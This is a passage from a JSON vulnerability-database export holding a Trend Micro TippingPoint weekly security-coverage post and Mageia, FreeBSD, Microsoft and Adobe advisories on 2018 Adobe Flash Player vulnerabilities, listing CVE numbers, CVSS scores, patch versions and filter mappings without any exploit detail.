"https://blog.trendmicro.com/week-security-news-trends-tea-parties/", "id": "TRENDMICROBLOG:0B24CF652B6ADAB5E1BE333A26A02E21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-26T09:59:23", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nLast week, three interesting vulnerabilities popped up on the news and security feeds. Researchers disclosed CVE-2017-5753 and CVE-2017-5715, collectively known as Spectre, and CVE-2017-5754, known as Meltdown. These vulnerabilities take advantage of \u201cspeculative execution\u201d of instructions performed by many modern microprocessors and can potentially allow an unprivileged attacker to read privileged memory allocated to the operating system kernel resulting in unintended information disclosure.\n\nIn order to exploit any of these vulnerabilities, an attacker must be able to run crafted code on an affected device. Trend Micro\u2019s TippingPoint devices are closed systems that only allow our trusted code to be executed. The underlying CPU and OS combination in the TippingPoint devices may be affected by these vulnerabilities; however, because our systems are closed with an inability to run arbitrary code, there is no vector to exploit. As of the writing of this blog, there are no known attacks that impact TippingPoint products. Our team will continue to monitor the situation and inform our customers of any updates.\n\nOn January 5, 2018, we released DV filter 30191 outside of our normal schedule to provide protection against a published remote JavaScript exploit of the Spectre vulnerability. Our team will continue to monitor the situation and will release additional filters as needed. Customers with concerns or further questions can contact the Trend Micro TippingPoint Technical Assistance Center (TAC). If you have other Trend Micro solutions, you can visit [Trend Micro Business Support](<https://success.trendmicro.com/solution/1119183-important-information-for-trend-micro-solutions-and-microsoft-january-2018-security-updates>) to get additional information.\n\n**TippingPoint Product Updates**\n\nEarlier this week, we released the following new releases for TippingPoint products:\n\n__Security Management System (SMS) Patches__\n\nThe following patches include minor enhancements, bug fixes and address security issues:\n\n**SMS Version** | **Patch** | **Software** \n---|---|--- \nSMS v4.4.0 | 2 | SMS_Patch-4.4.0.57192.2.pkg \nSMS v4.5.0 | 1 | SMS_Patch-4.5.0.98012.1.pkg \nSMS v4.6.0 | 1 | SMS_Patch-4.6.0.101914.1.pkg \nSMS v5.0.0 | 1 | SMS_Patch-5.0.0.106258.1.pkg \n \n \n\n__TippingPoint Operating System (TOS) v5.0.1 for Threat Protection System (TPS)__\n\nVersion 5.0.1 build 4821 has been released for the TPS family (vTPS, 440T, 2200T, 8200TX, 8400TX) of devices.\n\nTOS version 5.0.1.4821 will be released to manufacturing on March 31, 2018. All TPS family hardware appliances (440T, 2200T, 8200TX, 8400TX) will be manufactured with 5.0.1.4821 as January 9, 2018. This TOS release improves the overall security of the TPS and vTPS security devices, and resolves a number of issues.\n\nFor the complete list of enhancements and changes, customers can refer to the product release notes located on the [Threat Management Center (TMC) website](<https://tmc.tippingpoint.com/>) or contact the TippingPoint Technical Assistance Center (TAC) for questions or technical assistance.\n\n**Microsoft Updates**\n\nDue to the Meltdown and Spectre vulnerabilities, Microsoft issued an out-of-band update. The following table maps Digital Vaccine filters to the Microsoft updates issued on January 3, 2018:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0741 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0743 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0744 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0745 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0746 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0747 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0748 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0749 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0750 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0751 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0752 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0753 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0754 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0758 | 30160 | \nCVE-2018-0762 | 30167 | \nCVE-2018-0766 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0767 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0768 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0769 | 30168 | \nCVE-2018-0770 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0772 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0773 | 30169 | \nCVE-2018-0774 | 30185 | \nCVE-2018-0775 | 30186 | \nCVE-2018-0776 | 30164 | \nCVE-2018-0777 | 30162 | \nCVE-2018-0778 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0780 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0781 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0788 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0800 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0803 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0818 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before January 9, 2018. Security patches were released by Microsoft covering Internet Explorer (IE), Microsoft Edge, ChakraCore, Microsoft Windows, Microsoft Office, ASP.NET, and the .NET Framework. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [January 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/1/9/the-january-2018-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0764 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0784 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0785 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0786 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0789 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0790 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0791 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0792 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0793 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0794 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0795 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0796 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0797 | 30163 | \nCVE-2018-0798 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0799 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0801 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0802 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0804 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0805 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0806 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0807 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0812 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0819 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package also includes coverage for Adobe updates released on or before January 9, 2018. The following table maps Digital Vaccine filters to the Adobe updates.\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-01 | CVE-2018-4871 | 30201 | \n \n \n\n**Zero-Day Filters**\n\nThere are five new zero-day filters covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (5)_**\n\n| \n\n * 29948: ZDI-CAN-5154: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29962: ZDI-CAN-5210: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29967: ZDI-CAN-5223: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29971: ZDI-CAN-5227: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29973: ZDI-CAN-5239: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-1-2018/>).", "cvss3": {}, "published": "2018-01-12T15:09:44", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of January 8, 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-0741", "CVE-2018-0743", "CVE-2018-0744", "CVE-2018-0745", "CVE-2018-0746", "CVE-2018-0747", "CVE-2018-0748", "CVE-2018-0749", "CVE-2018-0750", "CVE-2018-0751", "CVE-2018-0752", "CVE-2018-0753", "CVE-2018-0754", "CVE-2018-0758", "CVE-2018-0762", "CVE-2018-0764", "CVE-2018-0766", "CVE-2018-0767", "CVE-2018-0768", "CVE-2018-0769", "CVE-2018-0770", "CVE-2018-0772", "CVE-2018-0773", "CVE-2018-0774", "CVE-2018-0775", "CVE-2018-0776", "CVE-2018-0777", "CVE-2018-0778", "CVE-2018-0780", "CVE-2018-0781", "CVE-2018-0784", "CVE-2018-0785", "CVE-2018-0786", "CVE-2018-0788", "CVE-2018-0789", "CVE-2018-0790", "CVE-2018-0791", "CVE-2018-0792", "CVE-2018-0793", "CVE-2018-0794", "CVE-2018-0795", "CVE-2018-0796", "CVE-2018-0797", "CVE-2018-0798", "CVE-2018-0799", "CVE-2018-0800", "CVE-2018-0801", "CVE-2018-0802", "CVE-2018-0803", "CVE-2018-0804", "CVE-2018-0805", "CVE-2018-0806", "CVE-2018-0807", "CVE-2018-0812", "CVE-2018-0818", "CVE-2018-0819", "CVE-2018-4871"], "modified": "2018-01-12T15:09:44", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-8-2018/", "id": "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-11-18T17:40:16", "description": "It was found that flash versions older than 29.0.0.113 contained a use after free vulnerability that could lead to remote code execution (CVE-2018-4919). A second vulnerability was a type confusion which could also lead to remote code execution (CVE-2018-4920). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-01T08:26:33", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-04-01T08:26:33", "id": "MGASA-2018-0189", "href": "https://advisories.mageia.org/MGASA-2018-0189.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 28.0.0.161 addresses critical use-after-free vulnerabilities that could lead to remote code execution (CVE-2018-4877, CVE-2018-4878). Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-07T13:50:37", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2018-02-07T13:50:37", "id": "MGASA-2018-0120", "href": "https://advisories.mageia.org/MGASA-2018-0120.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 28.0.0.137 addresses an important out-of-bounds read vulnerability that could lead to information exposure (CVE-2018-4871). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-12T19:49:32", "type": "mageia", "title": "Updated flash-player-plugin package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-12T19:49:32", "id": "MGASA-2018-0072", "href": "https://advisories.mageia.org/MGASA-2018-0072.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2022-11-18T18:17:54", "description": "\n\nAdobe reports:\n\n\nThis update resolves a use-after-free vulnerability that\n\t could lead to remote code execution (CVE-2018-4919).\nThis update resolves a type confusion vulnerability that\n\t could lead to remote code execution (CVE-2018-4920).\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "freebsd", "title": "Flash Player -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-03-13T00:00:00", "id": "313078E3-26E2-11E8-9920-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/313078e3-26e2-11e8-9920-6451062f0f7a.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nAdobe reports:\n\n\nThis update resolves use-after-free vulnerabilities that\n\t could lead to remote code execution (CVE-2018-4877,\n\t CVE-2018-4878).\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-31T00:00:00", "type": "freebsd", "title": "Flash Player -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2018-01-31T00:00:00", "id": "756A8631-0B84-11E8-A986-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/756a8631-0b84-11e8-a986-6451062f0f7a.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nAdobe reports:\n\n\nThis update resolves an out-of-bounds read vulnerability that\n\t could lead to information disclosure (CVE-2018-4871).\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "freebsd", "title": "Flash Player -- information disclosure", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-09T00:00:00", "id": "9C016563-F582-11E7-B33C-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/9c016563-f582-11e7-b33c-6451062f0f7a.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "mscve": [{"lastseen": "2022-11-18T18:33:48", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB18-05](<http://helpx.adobe.com/security/products/flash-player/apsb18-05.html>): CVE-2018-4919 and CVE-2018-4920.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T07:00:00", "type": "mscve", "title": "March 2018 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-03-13T07:00:00", "id": "MS:ADV180006", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV180006", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB18-03](<http://helpx.adobe.com/security/products/flash-player/apsb18-03.html>): CVE-2018-4877 and CVE-2018-4878.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T08:00:00", "type": "mscve", "title": "February 2018 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2018-02-06T08:00:00", "id": "MS:ADV180004", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV180004", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "This security update addresses the following vulnerability, which is described in Adobe Security Bulletin [APSB18-01](<http://helpx.adobe.com/security/products/flash-player/apsb18-01.html>): CVE-2018-4871.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T08:00:00", "type": "mscve", "title": "January 2018 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-09T08:00:00", "id": "MS:ADV180001", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV180001", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "adobe": [{"lastseen": "2022-11-18T17:23:41", "description": "Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address [critical]() vulnerabilities in Adobe Flash Player 28.0.0.161 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "adobe", "title": "APSB18-05 Security updates available for Adobe Flash Player", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-03-13T00:00:00", "id": "APSB18-05", "href": "https://helpx.adobe.com/security/products/flash-player/apsb18-05.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T17:05:57", "description": "Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address [critical]() vulnerabilities that could lead to remote code execution in Adobe Flash Player 28.0.0.137 and earlier versions. Successful exploitation could potentially allow an attacker to take control of the affected system. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T00:00:00", "type": "adobe", "title": "APSB18-03 Security updates available for Adobe Flash Player", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2018-02-06T00:00:00", "id": "APSB18-03", "href": "https://helpx.adobe.com/security/products/flash-player/apsb18-03.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T17:06:01", "description": "A critical vulnerability (CVE-2018-4878) exists in Adobe Flash Player 28.0.0.137 and earlier versions. Successful exploitation could potentially allow an attacker to take control of the affected system. \n", "cvss3": {"exploitabilityScore": 